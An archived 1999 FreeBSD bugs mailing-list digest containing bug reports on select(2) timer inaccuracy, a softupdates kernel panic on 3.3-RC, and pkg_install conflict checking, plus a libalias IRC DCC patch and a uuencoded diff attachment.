<199909082245.SAA11837@misha.cisco.com> Date: Wed, 8 Sep 1999 18:45:58 -0400 (EDT) From: Mikhail Teterin Reply-To: mi@aldan.algebra.com To: FreeBSD-gnats-submit@freebsd.org Cc: lawlopez@cisco.com X-Send-Pr-Version: 3.2 Subject: kern/13644: select(2) timer inaccurate, especially with -pthread Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13644 >Category: kern >Synopsis: select(2) timer inaccurate, especially with -pthread >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Sep 8 15:50:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Mikhail Teterin >Release: FreeBSD 3.2-STABLE i386 >Organization: Virtual Estates, Inc. >Environment: >Description: The select's man-page says: If timeout is a non-nil pointer, it specifies a maximum interval to wait for the selection to complete. If timeout is a nil pointer, the select blocks indefinitely. To effect a poll, the timeout argument should be non-nil, pointing to a zero-valued timeval structure. In fact, the select on an empty list of file descriptors -- as done in TCL's Tcl_Sleep, for example, will always add about 10 msec and another 10 if compiled with -pthread. >How-To-Repeat: Consider a program: #include #include #include #include struct timeval t1, t2, timeout; main() { timeout.tv_sec = 0; for(timeout.tv_usec = 2000; timeout.tv_usec < 40000; timeout.tv_usec += 1000) { if(gettimeofday(&t1, NULL)) perror("gettimeofday"); select(0, NULL, NULL, NULL, &timeout); if(gettimeofday(&t2, NULL)) perror("gettimeofday"); printf("Slept for %d instead of %d microseconds\n", t2.tv_usec - t1.tv_usec + (t2.tv_sec - t1.tv_sec)*1000*1000, timeout.tv_usec); } if(gettimeofday(&t1, NULL)) perror("gettimeofday"); if(gettimeofday(&t2, NULL)) perror("gettimeofday"); printf("The gettimeofday overhead is %d usec\n", t2.tv_usec - t1.tv_usec); } The output of this program compiled as usual is: Slept for 11248 instead of 2000 microseconds Slept for 19507 instead of 3000 microseconds Slept for 20103 instead of 4000 microseconds Slept for 19939 instead of 5000 microseconds Slept for 19910 instead of 6000 microseconds Slept for 19984 instead of 7000 microseconds Slept for 19986 instead of 8000 microseconds Slept for 20058 instead of 9000 microseconds Slept for 19980 instead of 10000 microseconds Slept for 29905 instead of 11000 microseconds Slept for 30010 instead of 12000 microseconds Slept for 29970 instead of 13000 microseconds Slept for 29988 instead of 14000 microseconds Slept for 30045 instead of 15000 microseconds Slept for 30011 instead of 16000 microseconds Slept for 29887 instead of 17000 microseconds Slept for 29991 instead of 18000 microseconds Slept for 29970 instead of 19000 microseconds Slept for 30067 instead of 20000 microseconds Slept for 39947 instead of 21000 microseconds Slept for 40019 instead of 22000 microseconds Slept for 39910 instead of 23000 microseconds Slept for 39981 instead of 24000 microseconds Slept for 40055 instead of 25000 microseconds Slept for 39914 instead of 26000 microseconds Slept for 40057 instead of 27000 microseconds Slept for 39910 instead of 28000 microseconds Slept for 39979 instead of 29000 microseconds Slept for 40054 instead of 30000 microseconds Slept for 49973 instead of 31000 microseconds Slept for 49993 instead of 32000 microseconds Slept for 50002 instead of 33000 microseconds Slept for 50000 instead of 34000 microseconds Slept for 49972 instead of 35000 microseconds Slept for 49994 instead of 36000 microseconds Slept for 50069 instead of 37000 microseconds Slept for 49904 instead of 38000 microseconds Slept for 49966 instead of 39000 microseconds The gettimeofday overhead is 5 usec and with the ``-pthread'' flag: Slept for 21687 instead of 2000 microseconds Slept for 29719 instead of 3000 microseconds Slept for 30010 instead of 4000 microseconds Slept for 29971 instead of 5000 microseconds Slept for 29986 instead of 6000 microseconds Slept for 30050 instead of 7000 microseconds Slept for 29987 instead of 8000 microseconds Slept for 29911 instead of 9000 microseconds Slept for 29974 instead of 10000 microseconds Slept for 29990 instead of 11000 microseconds Slept for 40072 instead of 12000 microseconds Slept for 40015 instead of 13000 microseconds Slept for 39904 instead of 14000 microseconds Slept for 39974 instead of 15000 microseconds Slept for 39987 instead of 16000 microseconds Slept for 39989 instead of 17000 microseconds Slept for 40187 instead of 18000 microseconds Slept for 39783 instead of 19000 microseconds Slept for 39970 instead of 20000 microseconds Slept for 39987 instead of 21000 microseconds Slept for 49996 instead of 22000 microseconds Slept for 49967 instead of 23000 microseconds Slept for 49996 instead of 24000 microseconds Slept for 49972 instead of 25000 microseconds Slept for 50143 instead of 26000 microseconds Slept for 49825 instead of 27000 microseconds Slept for 49994 instead of 28000 microseconds Slept for 49973 instead of 29000 microseconds Slept for 49996 instead of 30000 microseconds Slept for 49970 instead of 31000 microseconds Slept for 59979 instead of 32000 microseconds Slept for 59991 instead of 33000 microseconds Slept for 60000 instead of 34000 microseconds Slept for 60000 instead of 35000 microseconds Slept for 59979 instead of 36000 microseconds Slept for 59983 instead of 37000 microseconds Slept for 59994 instead of 38000 microseconds Slept for 60119 instead of 39000 microseconds The gettimeofday overhead is 5 usec Using usleep instead of select gives pretty similar numbers :( >Fix: The numbers appear to be constant, so one can specify a smaller timeout to actually get it right. But the values will have to be different with and without the -pthread flag. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 16:51:35 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from awfulhak.org (dynamic-29.max1-du-ws.dialnetwork.pavilion.co.uk [212.74.8.29]) by hub.freebsd.org (Postfix) with ESMTP id ECC841519F; Wed, 8 Sep 1999 16:51:29 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from keep.lan.Awfulhak.org (root@keep.lan.Awfulhak.org [172.16.0.8]) by awfulhak.org (8.9.3/8.9.3) with ESMTP id AAA04717; Thu, 9 Sep 1999 00:41:33 +0100 (BST) (envelope-from brian@lan.awfulhak.org) Received: from keep.lan.Awfulhak.org (brian@localhost.lan.Awfulhak.org [127.0.0.1]) by keep.lan.Awfulhak.org (8.9.3/8.9.3) with ESMTP id AAA06689; Thu, 9 Sep 1999 00:46:03 +0100 (BST) (envelope-from brian@keep.lan.Awfulhak.org) Message-Id: <199909082346.AAA06689@keep.lan.Awfulhak.org> X-Mailer: exmh version 2.0.2 2/24/98 To: ru@FreeBSD.org Cc: joelh@gnu.org, freebsd-bugs@FreeBSD.org, eivind@FreeBSD.org Subject: Re: bin/7669: libalias does not IRC DCC packets under certain conditions In-reply-to: Your message of "Wed, 08 Sep 1999 09:59:43 PDT." <199909081659.JAA94740@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/mixed ; boundary="==_Exmh_-14309285540" Date: Thu, 09 Sep 1999 00:46:03 +0100 From: Brian Somers Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multipart MIME message. --==_Exmh_-14309285540 Content-Type: text/plain; charset=us-ascii > Synopsis: libalias does not IRC DCC packets under certain conditions > > State-Changed-From-To: open->suspended > State-Changed-By: ru > State-Changed-When: Wed Sep 8 09:59:03 PDT 1999 > State-Changed-Why: > Awaiting IRC guru. I fired the attached patch at Eivind (cc'd), but he pooh-pooh'd it for a reason I forget (I know nothing about IRC). Eivind, have you any advances on this ? -- Brian Don't _EVER_ lose your sense of humour ! --==_Exmh_-14309285540 Content-Type: text/plain ; name="7669-alias.msg"; charset=us-ascii Content-Description: 7669-alias.msg Content-Disposition: attachment; filename="7669-alias.msg" Use the source IP number when converting outgoing IRC packets rather than the IP found in the packet. PR: 7669 --==_Exmh_-14309285540 Content-Type: application/x-patch ; name="7669-alias.patch" Content-Description: 7669-alias.patch Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="7669-alias.patch" Index: alias_irc.c =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D RCS file: /home/ncvs/src/lib/libalias/alias_irc.c,v retrieving revision 1.4 diff -u -r1.4 alias_irc.c --- alias_irc.c 1998/06/06 21:52:36 1.4 +++ alias_irc.c 1999/03/09 09:24:09 @@ -208,7 +208,8 @@ = = true_port =3D htons(org_port); - true_addr.s_addr =3D htonl(org_addr); + /* Use our source IP number, *NOT* the ``org_addr'' that we found in= the packet */ + true_addr =3D pip->ip_src; destaddr.s_addr =3D 0; = /* Steal the FTP_DATA_PORT - it doesn't really matter, and this --==_Exmh_-14309285540-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 18:21:31 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 39EED14C36 for ; Wed, 8 Sep 1999 18:21:30 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA40281; Wed, 8 Sep 1999 18:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 503AB14BD3; Wed, 8 Sep 1999 18:13:07 -0700 (PDT) Message-Id: <19990909011307.503AB14BD3@hub.freebsd.org> Date: Wed, 8 Sep 1999 18:13:07 -0700 (PDT) From: jsuter@intrastar.net To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/13646: Kernel Trap error when booting 3.3-RC kernel with Softupdates enabled Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13646 >Category: kern >Synopsis: Kernel Trap error when booting 3.3-RC kernel with Softupdates enabled >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Sep 8 18:20:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Jacob Suter >Release: 3.3-RC >Organization: Intrastellar Internet >Environment: can't get to it at the moment. It was built off a cvsup of 3.x-stable from cvsup2.freebsd.org @ 5:00 PM CDT 9-8-1999. >Description: Hardware: K6-2-350 (known to be good) @ 100x3.5, SIS530 mainboard w/ 1MB L2 (pcchips "598" v7.0 board) with 2MB shared video ram configured, 128MB PC100 SDRAM, ASIX 10/100 C-net Pro110B card, IBM 14.4GB 7200 RPM configured for DMA mode... After building a kernel with everything configured properly (at least to the best of my abilities) the system built fine but I forgot to build softupdates. Rebuilt the kernel including softupdates and it gives the following error on boot (before loading fsck) Fatal Trap 12: page fault while in kernel mode fatal virtual address=0xbffffffc fault code= supervisor read, page not present instruction pointer= 0x8:0xc01ede88 stack pointer= 0x10:0xc8bf0e88 frame pointer= 0x10:0xc8bf0ea8 code segment= base0x0, limit 0xfffff, type 0x1b, DPL 0, pres 1, def32, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = 1 (init) interrupt mask = [nothing here] trap number = 12 panic: page fault then it informs me how much it loves me and reboots in about 15 seconds >How-To-Repeat: softupdates on 3.3-RC. Not sure if its due to my specific situation or not, as I do not have additional hardware I can install 3.3-RC on currently. >Fix: no clue >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 19:20:26 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 739B01580F for ; Wed, 8 Sep 1999 19:20:06 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA45505; Wed, 8 Sep 1999 19:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from spare.westbend.net (news.westbend.net [209.224.254.133]) by hub.freebsd.org (Postfix) with ESMTP id 0005E151EC for ; Wed, 8 Sep 1999 19:12:39 -0700 (PDT) (envelope-from admin@spare.westbend.net) Received: (from root@localhost) by spare.westbend.net (8.9.3/8.9.3) id VAA58160; Wed, 8 Sep 1999 21:11:38 -0500 (CDT) (envelope-from admin) Message-Id: <199909090211.VAA58160@spare.westbend.net> Date: Wed, 8 Sep 1999 21:11:38 -0500 (CDT) From: hetzels@westbend.net Reply-To: hetzels@westbend.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/13647: Conflict Checking for PKG_INSTALL tools (3.2-STABLE) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13647 >Category: bin >Synopsis: Enhancement to PKG_INSTALL tools (3.2-STABLE) >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Sep 8 19:20:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Scot W. Hetzel >Release: FreeBSD 3.2-RELEASE i386 >Organization: West Bend Internet >Environment: >Description: The attached patch adds additional functionality to the pkg_install tools. pkg_info can now do pattern matcing: # pkg_info -e cv* cvsup-16.0 cvsup-mirrot-1.0 This will also allow bsd.port.mk (with appropriate patch) and pkg_add to check for conflicting ports before installing a port. pkg_create adds port conflicts to the package. With the appropriate patches to bsd.port.mk, a port that has the following in its Makefile: CONFLICTS= apache*-1.2* apache*-1.3.[012345] apache-*+ssl_* will result in @pkgcfl directives in its packing list. @pkgcfl apache*-1.2* @pkgcfl apache*-1.3.[012345] @pkgcfl apache-*+ssl_* >How-To-Repeat: >Fix: Apply the attached patched to the pkg_install tools. begin 644 pkg_install3.diff.gz M'XL("-$-US<``W!K9U]I;G-T86QL,RYD:69F`,0[:U/;R+*?Y5_1\;D)-GYA M`P%,Y22$QUEJ"?$%LB=;2?G=/ZSPO/Z?2D1:>*+>S^\A00_I!^%T&YVMIJ=YFYI MZ(]&T)A"(S%#H+%N-!KZJ],^.#AH;>%_;6CO=+=VNUM[CH50J]66YAW`5KO; M.>ANORR]>0.-]LYN_0!J]-$^@#=O2N``_HE`"O!'4*E`&^_'!U M44EX`(]4K>)D![_(3][X"[P"F29>/*_@2.A.!(_6(9M^F(?]A^,XK4T07V,W M'`(2!F(W'?,Z2",838-`_=ALE6J.XXW=!#;E8:E&>Q)B(_'5EZFL;+K)[7VU M"@@L$2.1\'*7&0)#/Q%>&LP)""ZCS7/H)L(-:%,%H@YYO!'9AN,83!%V$$5W M,(H22,="`?=#_HXGP#W$$.+`]2R^EGZ^1+"X2RJ24.-*SQVB9T6^&OGA<"!D M.G%3;XQB0`A4$&WZ[$23/)>?PW)=UD%!.32KS>"MAX+C?*V>$T<,*T=+[:)L0B090G/\PLV/W76H;='=3K3L$RJ"'(<"?C M8']IO=]O=0Z@O=O=V>VVVXZ%0_9A<>JRB=C>K;^$&O[;WF4#@0BGO@>LDA?1 M[8F??#H[OSB]/'IWVG]W]/'+H9V"0@>_N[&:=,AZ=#V.IL$09JB<(A"IT!!> M,_]+-9SA(3E0+%"+I6`=0C*AZ4$;@5(XG(.F&$YQ)4BD+$0H3PG*(U5XT-#][J(0HNQ=HHB$^Y(/L M;]?WH7:P76_OVY-H\=DB&[/Q>6M#KS:.1!VQ#F=^(M.>"*MVLQX9#5RTI5%D MY/!W!?''CUN4K/"^TOOY7_V3MR?G5V@A7P,]ZL+)Z5G_XCV.GU^1-ZEI@S5Q M[P3(:2(T*#S]%`5A#LK-/&.1R:R3+W%2A:=6X<\_43X#/[Q+HVRTJNPQ3X=[ M.9>IF%3*+=+[R1WMT(BA,8&]W5TTQ&BG]"I>Q(8J2;Y6VG4HG[BI2S:_08O0 M=*.I0\&"@<$;(#YEC9TX0Z\CLH<^<=8Q((_L#$9KY56A`VPH([1@+>3>'4,R0 MYH(Y0_)U<$"*TFX?U-O;5L"T8P(R/><2_!1(D%N MIK>_@T2GY(]\#TU#%"JCY"@W3J$/!SV60TON/7MLW))^(LD:49`3S=!L(;T1 M&)*X;!PFE.-`N!0Q*/.#TABR]#TK*P^+V#>;39B&J1]HS@F8QC#STS$R;B!H M&S2&P93PAFZC!4BUG\YT-'(;H34=1)/!H4:=S4_.V?Y$\)2[_9=(Z:C*U?*) M%`_-D::A.\#HAV(T@3$+_!^Z61C,Z4AEM8!]K;9U;:7[[?8^VB^.,I7R.Y8Q M>7U'4V@"/PV*C^Y%\9Q%5+JAG\XWT.RCMI)%)E="`2;*7WZQXILY'D&?Q`0= M2=XH\WD:*H@D'["P[0LYJ,*K5W!V='ZAF9XPY0/#\4J+A#$7J^B>R8VCRAS\Y6*8M"'7'N["#N MN_OUE[M6=7MWMYQ?GU39\L"=OWN/%/9GX7 MRFX8A?-)-)7EPYS9NU;QQ$QLH/TS1BT1MP@,_=^0$&VP..IP67DG%)KGLL4V M^DG>I6Y.4-4^:BU8-M;YZ9"9%W(H:@&G8,_.HL032HZLC5%RPXJ8GM<@,D#B#":WHZ9N[>H9$DXP4@"9E%R M9RT]^95:D<`K@K)H!%.Y.HHSKN0/!^6,0XW!=+08K.@G=M6:YRI#5%X7LRO4 M_,0;)Q5]ZCIL-#:06<]>`9FWJC'DVOS@M@6>J6P+<9$-/5IK?WFUL;FQ^ED' MGW$(HX,*\\?)*@IO,<53+.G;0?&JG&5ZD[$:>[7E69R#8A63<-@[A MJ>RVKL/YYIB8HK;(>\(-E2LA'Q6.`M^CJ,38-KF"[;09*S@K=7.,YSB$&.C_ M5ZS2:+74^;\G`9KON";%N(&XK`P$ZNGQV455XT_AL!].Q:&>GLN3.>G5F7(O MKU7F*%(Y7!IK4NX,5K"T[:EJ/)`>,U=V[2$UC=B19+$@)H*M7"(XBJ#Q6V;Z M-40\.]/^(3'2Y,1!R5=A M^J-%"?XV64(:M:LV@E,IJ9N.BZ3%5)+K.&1NV1-G,><9AG`Z'M+QE0TNR,]I M'ULF)WMTW1]6JY6"T4F$RTK&K,$W]W"*(DF$$2>BP]\J2R7B9QDJ)E$ MJ"XF(LH?4QJ`-#/[]V_>]\K5/*=R52I3@R1HNA[%QZ7?*O#M[%+B7MON[-;; M6SHN,ZN]6)]_49B<@CA=1"Z?#7,7/AJBR$*$R[E(N2PX[G"(LUAL-%2,3\J- M>RA3;*26:DJN7ZPA%'W9VK]>(D;^5]XF-ML\=:G^HM>:,.:C+G2Q)&+@?60ST2KD%,H`!1-$634_23RA&!*N^%\YLZKO!5G8&87 M);@<@2GN[F'DNH_LW>G4=W3UW"G8.LWN;RI0;^0*PUF!4V=DI6\G8F.XD1WW+M^/WES>GES;5- MCIP%@HJLKHK`QRYEM&"7\3%>(V%II5/8S,G3K+%`G89CDXSBK8.5R$H\0YN. MZ7BV617^A$Q0&]=KI'SQ)&;)PY)A2O??-S/WODOT5>8E5WJU>H-/C-!L*5'JDX?^>`?LKM%TK2Y]3QEFS7&=G5)^9KY(DBIFG M=X+#9615'"5N,C>W`D:?T62@JNC!"D<,;*R<@HXM*-&2#L$Z,[W2&SW^&`UK M8A\^B9Y7/$Q5%[^R.I5%S:0XW[+R[U*(E2<\5:QFKBK2\FV-";&^+R4Z.N!; M1;XK4V6X[8-=4X8S[O^;*7HN$"Z/"-KBI4R>,+'5B-S$YRMJ*0KK?.(/>ONL MI,1U`#1Q6RJ$V3[@RNS.03N/<+XT1+^7Z@4S$03(2C=)?8RS%454H8\X\?]0 M0%L/<[EZYM@[1W.&![*UHY1DCO-?3F.I;I;+A%,RM4U%6%V'4Y']SO867334 M=CO;]6U5M70H!>[S;7>Y6293_.X=6D1C$.UR*#0PG)Q?]RZ.?M7VVJ"W`*HP M*0>JQOK,O0^JC+F4*:MBA-#%L&"RK^12NB)2=HCP9WPPL!%U9I)C:$"ZUY=R,$ANMC2S&TV7FQLW[9C2L2]!QC-\;)%%U_ M;)C(]%NN,&K0<-,\NUJ9`5]ZN)(OQ@KS51"&JA%[[PR@6Z[FA?D93ZSF[GQ4 MAD'+\L>S-TM4HU-&;)_,?FWWP+87:"/?M84Y7>U;JLH9=+)J',;OA0L:4HJ5 M?KNV/$H7D,9=Z:M#G4"3\R)4=]M<27FY77!41G>O?93$`)[3=:`G_'LJ5J%] MF[][^<]H_? MG>3,,9_767U@9_V)OV7NF5"D2.&KGU;:^'Q=JY**>9OM']6J9/9?W\1XL-S$ MR$.0XCDF?U04*"Z1W$D1^R57=3TQCHWF-BP->B MB*OJ"$#A2$43X&8\E3"/IIA@STOVRI16R:R?D`MQJ!+4*&*N&AD()\%(``D5 MT;QMEJ!Y.2DU=,-!&C=)209RV(R2VU8\';3.\/?;ZY.6N2!I83(9!+*%]G+< M:#?;.\T=*DA6FZ7:7P32:6YUFFT-!"ZC%+D,YR,^X@QS5_)U4XQ>H?D6&84. M$!-,7Y:X"\37?1WVAKFS!37ZW%:U3$(&%UZ/X>;T^*?+\^.C"_1@-T?G%]=\ M3FS-0RU$, M;^FI8D>4S#D2E72]E-9+#0KGD3B6/L>BA3VM,C'5S"V^1]R_3?O>NCE^;Y4I.0N_SZ\2[5H M9"TVXMLE[@;(W7`Z`:0F5YO4!SXY3TL-=8OO%U;EKVM7WBJX7X^HB[KA7UHI<5@V-1GND8O MR)W%^3T*X7&%]/AI.&97@7IQ\W@";U#.O5%0JBEVH]H@@E((?/HQ827P\%A( MG#9@VJ_J<.'#9S4;-L$>F81L_9EK=.;:$3=2KSTJ&&SQ60D6L845V+(V9POAB!(-S$-!2;ZDR;]-_22C)+\EVIA6OA8I"K M.O+"N7#&1Q3R]_.;]Z?TD)9@F=EH![-Y@*?7R<"WQ5&4=)*C-_15*+'%R[LX[`"3YU*28DT'A0G,-?)0H8]T%2 M]=B+`G2_>(Y3$E6:@FZ<>GOJH066;VXM)ZHEM&\"!FL#WS;UUK<+@:\:`HL\Q;WFQXH. M_6W'0J&P=V'FB@;]O7J[@R*U9U[AP9A`4`:%&;2S>?K5"Z9#<89F\W#AT;L4 M(\?%P1Y[!\KW%X?1Q2V.OIWZP?`7U8JT\MEY.(H6=NAA!M03X:"W^VAR*?X@!/-]V$PSV#1\)4(6)PO_/!.+CXB9YM@OB:Y M(X$Z]JG(0GZBIQO>S_L%?6"ONOE_O]I7=3U-#:M];R M,K_C6`B/>6M-M1/OZRSO'W[(,@[EP!\TQ^7\B-$>'$3KF7MUY7W,B=HG:BTO M_WKY?GP_ZL;=7M?K#KM^][Q[U_VYFW33[L?N27?2E=WRH7UG9.7Z*P/@^"$0 M*`=:G_C&RW%LS.)Q7\)7/2,$7MC`*OMAEM:SEN)`&HU%%#QI=RRF\PV]Y%+5=C=665+TP M;O5<0["O)9'"8FQ"JMGO]RKJI1W647[AAE]WVFO;AAWB@]T9.?+KZ;6IO@U0 MN.YH8=P\7_J&BGSRFX^]_C48)7\@E]Z_"8B?8LA9AK1 M]Y'-=NF7CY&'E_AQ^H7AP=+?I\8YQ&8._KJ#8?;C9XASOQ)(S(^UP%*^J43) M$[3B([HDUD*RJ31P0JUG5.E3`W2GO>Z,5XN'/`;O.^=E<*NPRJCPZ/.NA96C MPA./2Y?M*T%.8$(62:UJ>-28PK:N0=C.WI(354-/>,&37*F&\[@7/-M;;38K^-'I+-?6]0TT MTSG?[=^;VJJ3+HG8^J@[HJM(>IA/_NN<.8;SPKMTRAAE+\N9K@]J`K56=[$[ M^TK?=A+U[/9==RYFDJ?!6F,P'0^C6>'M/#5=W:(^@(!Z>ZM#KVZV._O&[=`?%6,6 M"*1$OII_YT8[-9W`$RZ8<+[Q9OR"[]*EDGD#AP6#5U9SDJ(&F#OJ5FIA^[.C MB^M3PZ;C?Y_4U94BN4/+S'X:Q0L,Y9D:N"6NQE]]PB9<34,81C/U[CKC2E4A M:=\HPM29#!*1FL6<"D$2@XT[*ORZ_,S"("9-75D_X'>W.GNYEWRIR%_1 MT:#1/AX[05.9'R@0X2EW;N/E.[>;JP^GW-]QK:X!66+,#=SVMJI<[)K+PMRK MGG[8Y^NVJ>YISGZKX.<)%V/COWPQ9JRL];`_Y'IL!1;K+\G(3&\7+\EX"`J' M,/=D9F"%T=]U+#1S5;8P>T7=@"_+\%_U3F;S$I43IJD?T&M\5/]A"'SM$(W2 M&55@;0T(9>T_Q5U[4QO'LO];?(J-3B5(:$60A/$#8Y=C@TT%;%_`-^=6XN(* ML0+="*VB%29.S'>__9SIV8=X'*>KI_/1N=D`5IQ@K)0Q!F MWA_N'LJ=U^J[:;0SCDB*6VKYIP/S^#)Z,6-I!PIQTGM,"E*FE$++TZ4-J:#> M=I#4WL4M;*,7=QXZ%>F[]T>[[]X>LN;)WZ&@V(&+%[V'402FZSH<7'8Y1<5D M\1E MV>4%`QZ0?A/VKWF23=&_'3:K/BLVJ8ITZ.HF!`Z^,B)-?!_$J#[4A8U^2B8C M%*N`Y\[FYZ231^],TOA]1@)<@$0_FJ)&M^+R0C$Z`M[<0&;W_L7+GW??OHZ0 M<>I5'_J-D^!VD@"%FZN.2`=+K8.D3<<@VO9543HR+?Q^]B-Q8<54(?\D`2:ZU*)*8IB'4*J/*`QP\@SJNQJ-QW2=<(%'/-(ZGR3BE82*8R`! MC!?(:96\4)#5[FY.R8AQP$O1#CLX_Z\EP_(R4=,YZ^IE!'8?JLI5P19V=&A; M[\")LD-ST]QWG2;V-FU?/TS5/8TJI54-7[S9(D\C_<#BA*EZ=ODR_IO+6H-? MM#^U7B6#,2Z$OI^[=%F%-PHT>6UFJ37&>4?;V57JKUIP;?;A&[M3?*;[?8:& M7W2=+E>>\$WEXF20MLDF#H?@LK+M!7ZF[7'%S4>IXGS!_C#^IF>`\2(=6K>H M.Z:DB#I-^\"X5.C?J+G2Q/_'I?+^0Y8W'L<]D.?@G\[Z6JA`>PK"X^KY,YMR M(DA7F"O)3N3V>BC7'2'8M_!F\%E2U++;IO/OQ\ M@>5$7ZI>9_B;B\6B%Y9:!@-&64&)@+)-DJOYV?S7_1?_QENNO>VW'RU@23H^ M7?!V)1OWLW-)0?`2>AZ8A(%]&#FW7O8@&#`HTBGU7ZY]J+U8%5K\&&`S28\& M@X^"7"(8!+,)XA-H>1V[&S2B!ZRA7"[E]<5'?($6<,[@F>PF>2#80LR#@I\_ M8!==P:B%@!J;DE6`N\YG_,A&=>0%(1^F26(TY*?WK994.VBU?,O7M@=$G1'V M``J-HJ>2'Q^T3`U'/4%SO1_D*\)X'.TX"8$_!@,XI:VN_@CGII[X,4/WMZ+> M9M'J[K;U_9"C(Y$#<4@(=:3T;=,9\`G"3T&UM7-I(,QP7="*($MXO.;MS\X2 MVL`II0T'H?^[S-34U%F3ZA3@"26]MG::EQ,WX9ILQ.T]P]7JC_-0I76NRE5Q M[4WWI8="&LE7564P',%GTOIM>?M1O(\O>8DC4(QL[$`^$,%@*QYEP/1F*0B1 MDX2]?(.;5-@9"-.F@-8$V7#!,"`3*7-7/DT[BM"D"5W/+>1T(T`@\"J.H$!S MT_=MIG(*,BT^%K[:/3@^V'>7S!6B2<3%"@QNQNK?AKL#(B>C$0L?AI'E@)(, M@T+4J4_5+`C?1FZ-PB(=D`L6I@_XK-Z2UO^RF]30WHE!5*>I"J0 M-T[32>(U#][+PAEJHT+N&=IIQV[AESIB:_?57GMK*Z"VS#TMPOIO*+O#@CIF,]H84.`Y`I>]] MW=G6D/98L6'!O8`$>X=PQK,L*EQ;HAQB+A[1G1K5\6T_K0CK"[J,.3?MB[F\ MD"L>8:J7`X&GR10-S,[8^<6T#/#+4MK,Z1KM0OE;(?<6X32(&'`>>@,ED]E> M,@'VNY>0&!1;0662CLD(?^;77^TBT"%P->/]Q'C;?R[Q.F0M'WP?M6[K]ZL(.N*UP/ M-%/P9\Y-(B@#&XEHZ,AF![5#;F@6(BD.6),&M>*0&Y-F6[$5H5FG35[+W]^8EJ^X,K9^.Q$AQJY#B#E!') M$GZ+R\NUO7$-VWGYAKLKY/D%_L&-N,U+6 MS^65GX#D\/L]:W=7Q/D7U[G)95"67K[9?OGSX8?]XS?;+UYM'P1S)F0>/Y3N M"A^+YQ/Y#I7,I!6R$NC-Z>44>\,>G/0NF"#BO>??XKJU*UC387-&26Q**3X? M[XV0XG];JCA2&?J9=':D##F&%%="60L#.!T2NW-G394_2>PDD=.KU%6A_XA, M25J=1QMJ4O(OO-,%8?SHW;N?=E\CCVWJ[*7?K6@#_I<44M3#(Z.'#M)+$%*? M11?]/^&PD_FZWG\X?//NPU&#()JGEW#@!(D_8BX.HDSTFUQ`A=4([SD\>G%P M='ATL/OV=;.->#.0O>W=O8"Y<#%L$EC4%SAH17].AU$;I%6?E0\\Y,/CLS== M;36YJFBL::$:N8K!,<%A-7Q*T4,906Y&TP0UQT$#U_[G17*1)6&W8`<2JG`9 M<3^&0_'\>'!NA)1P<+!8;"V6%":G)=M6.=DP=^O6-&O=2+)6GF*MVQ.LY>C5 MNB6Y6E$UM5JW)5;K+K0B9VV4SS.TR`K@(5V6=F"T-6$M=\/(CZHS;&Y:+8'/NA#( M>>HTCHQJ;OJT"-]:&&BW\Y#&"O\(K.D=',T)+^W6[L7&85%/%&Z$4\5=%1U< M'MGKSF['XK;KT#*T)8?O*AL)_N=!K2-!(NT]0FN!+AJIB36)N[2EK<=^T:5V MV2>-"I^%E#2049Y)I\;71WP%`\>XP?ER%K6,/RU?*5T1&B%P$7)?O[1@=5"Z M"VM)G0#01^UR,E#7#-%SL9"._ZQ"=Z=J=Y(#B?6(F3RT5B"JGV`$ M[2$)S[)OX0-,P>$T.%M#!ZA7A$W*A!LT++<;H(62V@?II=N8,/IU0RA]B[G@P9V5%*4VL)PG`J> 